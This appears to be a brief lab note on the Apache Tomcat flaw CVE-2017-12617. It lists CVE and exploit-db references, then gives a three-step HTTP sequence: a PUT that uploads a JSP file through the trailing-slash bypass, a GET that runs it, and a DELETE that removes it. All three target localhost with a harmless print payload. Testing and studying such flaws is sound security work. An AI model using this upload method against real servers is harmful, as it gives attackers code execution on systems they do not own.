- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
- https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
- https://www.exploit-db.com/exploits/43008/
- https://www.exploit-db.com/exploits/42966/
1.PUT http://localhost:8080/test.jsp/content-type: text/plain{<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>}
2.GET http://localhost:8080/test.jsp
3.DELETE http://localhost:8080/test.jsp/ HTTP/1.1